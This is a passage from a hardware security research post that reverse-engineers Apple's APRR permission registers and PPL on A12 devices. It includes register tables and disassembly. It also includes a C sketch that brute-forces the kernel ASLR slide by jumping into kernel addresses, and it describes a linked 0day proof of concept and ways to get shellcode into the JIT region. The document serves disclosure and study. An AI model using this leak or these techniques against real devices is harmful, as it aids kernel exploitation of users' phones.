0xe     r--             r-x
0xf     r--             r--

And then we can take some of the values above and index them for each row. Let's take for example the values the A12 uses when entering/exiting PPL (as well as some reg 0 value):

Index   Krn/Usr    Reg 1 on PPL entry   Reg 1 on PPL exit   Changed?   Reg 0
0x0     rwx/--x    0x7                  0x7                            0x1
0x1     rwx/---    0x7                  0x7                            0x0
0x2     rw-/--x    0x6                  0x4                 <-         0x0
0x3     rw-/---    0x6                  0x6                            0x0
0x4     rwx/rwx    0x6                  0x6                            0x7
0x5     rwx/rw-    0x6                  0x6                            0x6
0x6     rw-/rwx    0x4                  0x4                            0x7
0x7     rw-/rw-    0x6                  0x6                            0x6
0x8     r-x/--x    0x5                  0x4                 <-         0x0
0x9     r-x/---    0x5                  0x5                            0x0
0xa     r--/--x    0x4                  0x4                            0x1
0xb     r--/---    0x4                  0x4                            0x0
0xc     r-x/r-x    0x5                  0x5                            0x5
0xd     r-x/r--    0x5                  0x5                            0x4
0xe     r--/r-x    0x4                  0x4                            0x5
0xf     r--/r--    0x4                  0x4                            0x4

Let's first look at the reg 1 values. I've marked the two digits that change on entry/exit, and sure enough they affect precisely the protections that PPL pages are mapped with.
Now let's see, from 0x6 and 0x5 both to 0x4 - does that sound familiar? Maybe from a UNIX environment? Maybe from a tool called chmod?

The big enlightenment
They are permissions in rwx form! 0x4 = r, 0x2 = w, 0x1 = x.
The four page table bits that normally determine the access protections have lost their architectural meaning on newer Apple chips. They are now solely used to construct that 4-bit number, which is then used to index the APRR registers, which hold the actual permissions.
Register 0 is used for EL0 permissions, register 1 for EL1. If registers 6 and 7 are still unclear, we can simply repeat the above process with them:

Index   Krn/Usr    Reg 0   Reg 6 if JIT enabled   Reg 7 if JIT rw-   Reg 7 if JIT r-x   Changed?
0x0     rwx/--x    0x1     0x0                    0x6                0x6
0x1     rwx/---    0x0     0x0                    0x7                0x7
0x2     rw-/--x    0x0     0x0                    0x7                0x7
0x3     rw-/---    0x0     0x0                    0x7                0x7
0x4     rwx/rwx    0x7     0x0                    0x0                0x0
0x5     rwx/rw-    0x6     0x0                    0x1                0x1
0x6     rw-/rwx    0x7     0x1                    0x1                0x2                <-
0x7     rw-/rw-    0x6     0x0                    0x1                0x1
0x8     r-x/--x    0x0     0x0                    0x7                0x7
0x9     r-x/---    0x0     0x0                    0x7                0x7
0xa     r--/--x    0x1     0x0                    0x6                0x6
0xb     r--/---    0x0     0x0                    0x7                0x7
0xc     r-x/r-x    0x5     0x0                    0x2                0x2
0xd     r-x/r--    0x4     0x0                    0x3                0x3
0xe     r--/r-x    0x5     0x0                    0x2                0x2
0xf     r--/r--    0x4     0x0                    0x3                0x3

The only digit that changed in reg 7 is the one corresponding to rw-/rwx - which would seem to be the permissions the JIT region is mapped with. And obviously that is also the only index at which reg 6 has a 1. To not beat around the bush any longer: register 6 tells us whether or not to consult register 7, and if we do, register 7 is used to mask out certain bits, i.e. if the digit in question is 0x1, that will strip the executable bit.
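
Putting the pieces together, here's a sketch of how the effective permissions appear to be derived (HPD/PAN/WXN are ignored for now, and since I haven't verified whether register 7 also masks the EL1 view, it is applied to EL0 only here):

#include <stdint.h>

#define PERM_R 0x4
#define PERM_W 0x2
#define PERM_X 0x1

typedef struct { uint8_t el0; uint8_t el1; } perms_t;

static perms_t aprr_effective_perms(unsigned idx, uint64_t aprr0, uint64_t aprr1,
                                    uint64_t aprr6, uint64_t aprr7)
{
    perms_t p;
    p.el0 = (aprr0 >> (idx * 4)) & 0xf; /* register 0: EL0 permissions */
    p.el1 = (aprr1 >> (idx * 4)) & 0xf; /* register 1: EL1 permissions */
    if ((aprr6 >> idx) & 0x1)           /* register 6: consult register 7? */
    {
        p.el0 &= ~((aprr7 >> (idx * 4)) & 0xf); /* register 7: strip bits */
    }
    return p;
}

For the JIT index 6, for example, register 7's rw- value has a 0x1 there, so EL0's 0x7 becomes 0x7 & ~0x1 = 0x6, i.e. rw- - matching the table above.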

With that all figured out, we can complete our register table from above with sensible names:

Register         Name
s3_4_c15_c2_0    APRR0_EL1
s3_4_c15_c2_1    APRR1_EL1
s3_4_c15_c2_2    KTRR_LOCK_EL1
s3_4_c15_c2_3    KTRR_LOWER_EL1
s3_4_c15_c2_4    KTRR_UPPER_EL1
s3_4_c15_c2_5    KTRR_UNKNOWN_EL1
s3_4_c15_c2_6    APRR_MASK_EN_EL1
s3_4_c15_c2_7    APRR_MASK_EL0

If this was a bit too much bit shifting and twiddling for you, I have some slides from my TyphoonCon talk on how you get from the page table bits to the actual rwx permissions (available in full here, pages 103-119).

Here's how it would work in a standard ARMv8.* implementation:

[Image: TTE bits]

And here's how it works on chips with APRR (the orange boxes are register numbers):

[Image: APRR TTE bits]

Two notes on these:

- This still isn't the whole picture - there will be more detail further down this post, but that's not gonna fit into a nice graph anymore.
- If you're confused by the bits coming in from the top right, those are the "Hierarchical Permission Disable" (HPD) bits. Basically, a table descriptor can already have bits set saying that nothing under it may ever be mapped as writeable (for example), and the corresponding bit is then stripped from any entry mapped below it.

Mitigations gone rogue
Remember earlier where I mentioned some people's speculation that Apple had repurposed the UXN bit, and said that was an interesting way to put it? Time to revisit that. Let's look at PPL page tables again:

[Image: PPL page tables unpriv]

With knowledge of how APRR works, notice anything off? Anything about __PPLDATA_CONST?

Yep, that permission is not remapped (or remapped onto itself, if you will), which means it's actually mapped as --x in EL0! This constitutes a vulnerability that lets you brute-force the kASLR slide by simply installing a mach exception handler and repeatedly jumping to locations within the kernel's address range. If you get an exception of type 1, it's unmapped/inaccessible memory, but if you get an exception of type 2, you hit __PPLDATA_CONST. (Note that you can't leak data from that page though - you might assume you could, because the exception message contains the faulting instruction. However, that is obtained via copyin, which refuses to operate on kernel addresses.) A PoC is available here, and is still a 0day at the time of writing.
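
To illustrate the idea (this is not the linked PoC - that one uses a proper mach exception handler, whereas this sketch abuses signals for brevity, and all constants are purely illustrative):

#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>

#define KERNEL_BASE       0xfffffff007004000ULL /* unslid kernel base - illustrative */
#define SLIDE_STEP        0x200000ULL           /* kASLR slide granularity - illustrative */
#define PPLDATA_CONST_OFF 0xed4000ULL           /* __PPLDATA_CONST offset from base - illustrative */

static sigjmp_buf env;
static volatile int exc_type;

static void handler(int sig)
{
    /* SIGILL corresponds to exception type 2, SIGSEGV/SIGBUS to type 1 */
    exc_type = (sig == SIGILL) ? 2 : 1;
    siglongjmp(env, 1);
}

int main(void)
{
    signal(SIGSEGV, handler);
    signal(SIGBUS,  handler);
    signal(SIGILL,  handler);
    for(uint64_t slide = 0; ; slide += SLIDE_STEP)
    {
        uint64_t addr = KERNEL_BASE + slide + PPLDATA_CONST_OFF;
        if(sigsetjmp(env, 1) == 0)
        {
            ((void (*)(void))addr)(); /* jump into the kernel's address range */
        }
        if(exc_type == 2) /* fetch succeeded, decode didn't: __PPLDATA_CONST */
        {
            printf("kernel slide: 0x%llx\n", (unsigned long long)slide);
            return 0;
        }
        /* type 1: unmapped/inaccessible, keep going */
    }
}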

Now there is a lot of irony in this:

- Not only did random researchers think the UXN bit got repurposed, but so did Apple engineers, apparently!
- This is a vulnerability so fundamental that it is trivial to exploit, takes virtually no time, and is reachable from even the most heavily sandboxed contexts.
- It affects nothing but the latest chip generation. A11 and earlier are safe; it only exists on A12/A12X. Or, to quote Ian Beer on the matter:

    So what can you do to protect yourself?
    Use an older device!
    [is Britishly outraged]

- There isn't even a reason to put __PPLDATA_CONST under APRR! What are you gonna do, make it more readonly than it already is?
- This is the peak of mitigation madness. We literally have one mitigation breaking another.
- Apple's hardware team appears to be really competent; the software team, ehh…

And this isn't even the end of the story, but I'll leave the rest as an exercise to the reader.

Pentesting APRR
Aside from the info leak that presented itself so openly, let's go back and try to see what protects APRR against a motivated attacker. In the case of JIT, things are pretty simple:

0x188347298 002298f2 movk x0, 0xc110
0x18834729c e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472a0 e001c0f2 movk x0, 0xf, lsl 32
0x1883472a4 0000e0f2 movk x0, 0, lsl 48
0x1883472a8 000040f9 ldr x0, [x0]
0x1883472ac e0f21cd5 msr s3_4_c15_c2_7, x0
0x1883472b0 df3f03d5 isb
0x1883472b4 012298f2 movk x1, 0xc110
0x1883472b8 e1ffbff2 movk x1, 0xffff, lsl 16
0x1883472bc e101c0f2 movk x1, 0xf, lsl 32
0x1883472c0 0100e0f2 movk x1, 0, lsl 48
0x1883472c4 280040f9 ldr x8, [x1]
0x1883472c8 e9f23cd5 mrs x9, s3_4_c15_c2_7
0x1883472cc 1f0109eb cmp x8, x9
0x1883472d0 c1020054 b.ne 0x188347328
After the write to the system register, the commpage address is re-constructed, the value re-loaded, and checked against the value currently in the register. This prevents us from ROP'ing into the middle of the memcpy gadget and changing the register to an arbitrary value. So APRR itself is protected, but in the face of a calling primitive, the memcpy function will still happily put some shellcode in the JIT region for you, no change to the system register needed. And once you have code in the JIT region, the entire model falls apart, as you can now freely change the system register.

As for the kernel side, things are more complex there. I'll omit the code for brevity, but a lot more cases have to be considered. The PPL entry gadget also has ROP protection, and the exit gadget is on a page that is only executable in privileged mode, so it doesn't need any. In addition, interrupts as well as panics have to be dealt with in a safe way.
Panics are handled by having a per-CPU struct in __PPLDATA, which contains a flag saying whether we are currently in PPL or not. That flag gets set by the PPL entry tramp and cleared by the exit routine, and panic simply calls out to the latter if the flag is set, before continuing down its path.
Interrupts take a similar, albeit more nuanced approach. For a start, __PPLTRAMP has them disabled, but daif is set back to its original value before actually jumping into __PPLTEXT. Now, rather than checking the per-CPU data struct, the exception vectors for EL1 simply check the APRR register itself, and if it matches the privileged value, go through the PPL exit tramp. If it doesn't though, they still check whether it matches the unprivileged value, and if not, spin (see the sketch below). This means that even if you somehow get control of the register, you can't reasonably set it to any value other than the existing two anyway, since the next exception you take will kill you.
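
As a sketch, that check in the EL1 vectors looks something like this (ppl_exit() standing in for the exit tramp):

#include <stdint.h>

#define APRR1_PPL    0x4455445564666677ULL /* privileged value   */
#define APRR1_NORMAL 0x4455445464666477ULL /* unprivileged value */

extern void ppl_exit(void); /* stand-in for the PPL exit tramp */

static void el1_vector_aprr_check(void)
{
    uint64_t aprr1;
    __asm__ volatile("mrs %0, s3_4_c15_c2_1" : "=r"(aprr1));
    if (aprr1 == APRR1_PPL)
        ppl_exit();   /* took an exception while in PPL: exit first */
    else if (aprr1 != APRR1_NORMAL)
        for (;;) {}   /* neither known value: spin forever */
    /* ... regular exception handling ... */
}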

So again APRR itself is safe, but what about PPL? Can we pull the same tricks as with JIT? For the most part, PPL seems to carefully sanitise the input you give it. But then, seemingly at random - the trust cache, for example - they didn't bother with that and put all their faith in PAC instead, only to be monumentally let down. Taking a look at the iOS 13 beta kernels though, this appears fixed.
Apart from that, it might be noteworthy that, same as with JIT, any single crack will tear the entire model down. If __PPLDATA or any single page table can be remapped as non-PPL, or can be written to by other means, via peripherals or the dark arts, then that can immediately be used to extend this capability to the rest of PPL-protected memory. But eh, it's probably fine, right? ;)

Digging deeper
What XNU does with APRR is… alright I guess, but when we get such an undocumented blackbox feature, it would be outright irresponsible to not go and drive it up to its limits, right?

Again, getting shellcode execution in EL1 is left as an exercise to the reader (be that in skill or patience), but once you do have that, there's a good bunch of things to test:

- When were these registers actually introduced?
- What do they reset to?
- What are their maximal and minimal values? Can you just set APRR0_EL1 to 0x7777777777777777 and access kernel memory from userland?
- Is the 0x8 bit settable in any field? Does it have a function?
- How does HPD affect KTRR?
- What about PAN (SMAP) and WXN?
- Are the permissions accurately reflected by the at instruction?
- Can you create otherwise unobtainable permissions, such as write-only?

To answer all of that, I wrote a good bunch of shellcode that will run a number of different tests and dump the results into memory. The code is available here and raw results here.

In summary:

- Registers 6 and 7 appeared on the A11, but the core APRR registers 0 and 1 were already present on the A10. (Apple seems to have been planning this for quite a while!)
- Unlike virtually any other register, registers 0 and 1 reset to their maximum values, which are 0x4545010167670101/0x4455445566666677 respectively.
- Every bit can be set to zero, but bits that are zero at reset can never be set to one. This also means the 0x8 bit is never settable.
- TTE and HPD bits are processed before anything else. This yields what I call the "input value".
- The input value is then copied to a "working value", to which APRR, PAN and WXN are applied. Each of these modifies the working value, but makes decisions based on the input value rather than the working value (see the sketch after this list).
- The at instructions do accurately reflect the effective permissions.
- It is possible to create write-only memory and such.
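
As a sketch of that evaluation order (every helper and constant here is a placeholder; the point is only what each step reads and what it modifies):

#include <stdbool.h>
#include <stdint.h>

/* assume low nibble = EL0 rwx, next nibble = EL1 rwx - illustrative encoding */
#define EL1_RW 0x60
#define ALL_X  0x11

extern uint64_t tte_hpd_perms(uint64_t tte); /* step 1: TTE + HPD bits      */
extern uint64_t apply_aprr(uint64_t input);  /* step 2: APRR regs 0/1/6/7   */
extern bool     pan_strips(uint64_t input);  /* architectural PAN condition */
extern bool     wxn_strips(uint64_t input);  /* architectural WXN condition */

static uint64_t effective_perms_sketch(uint64_t tte)
{
    uint64_t input = tte_hpd_perms(tte); /* the "input value"   */
    uint64_t work  = apply_aprr(input);  /* the "working value" */
    if (pan_strips(input))               /* decides on INPUT... */
        work &= ~(uint64_t)EL1_RW;       /* ...modifies WORKING */
    if (wxn_strips(input))
        work &= ~(uint64_t)ALL_X;
    return work;
}
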
Amidst all my test results, something stood out though: weird things happen when you turn on both PAN and WXN. Let's diff 0xffffffffffffffff-0xffffffffffffffff-PAN-WXN.txt and 0xfff0fff0fff0fff0-0xfff0fff0fff0fff0-PAN-WXN.txt, for example:

[Image: diff]

It's the first line that's off here. APRR would dictate that the permissions should be none, yet EL1 can read and write. It appears that, if all of the following are true:

- PAN is enabled
- WXN is enabled
- The access is privileged
- WXN applies
- PAN does not apply

then the APRR register is not consulted. In addition, for the at instruction it seems to be enough to have both PAN and WXN enabled to break everything:

[Image: diff]

For what it's worth, XNU runs with PAN on and WXN off - but still! How does something like that happen?! Is there some Verilog code passage now where it says = when it should say &=? Did I say Apple's hardware team was really competent? I might have to backtrack a bit on that… but yet again we've seen one mitigation break another.

Conclusion
APRR is a pretty cool feature, even if parts of it are kinda broken. What I really like about it (besides the fact that it is an efficient and elegant solution to switching privileges) is that it untangles EL1 and EL0 memory permissions, giving you more flexibility than a standard ARMv8 implementation. What I don't like though is that it has clearly been designed as a lockdown feature, allowing you only to take permissions away rather than freely remap them.

It's also evident that Apple is really fond of post-exploitation mitigations, or just mitigations in general. And on one hand, getting control over the physical address space is a good bit harder now. But on the other hand, Apple's stacking of mitigations is taking a problematic turn when adding new mitigations now actively creates vulnerabilities.

At long last, we might have gathered enough information to make an educated guess as to what the acronym "APRR" actually stands for. My best guess is "Access Protection ReRouting".
I hear that when Project Zero tries to guess the meaning behind acronyms though, all Apple engineers have to offer is a smug grin, so maybe it's also just "APple Rick Rolling".

For typos, feedback, content questions etc., feel free to open a ticket, ping me on Twitter or email me (*@*.net where * = phoaxy).

Till next time, peace out. ;)

Thanks to
- windknown for being the reason I started looking into APRR.
- qwerty for being there to bounce ideas off of.
- Sparkey for testing a bunch of stuff for me on devices I didn't have.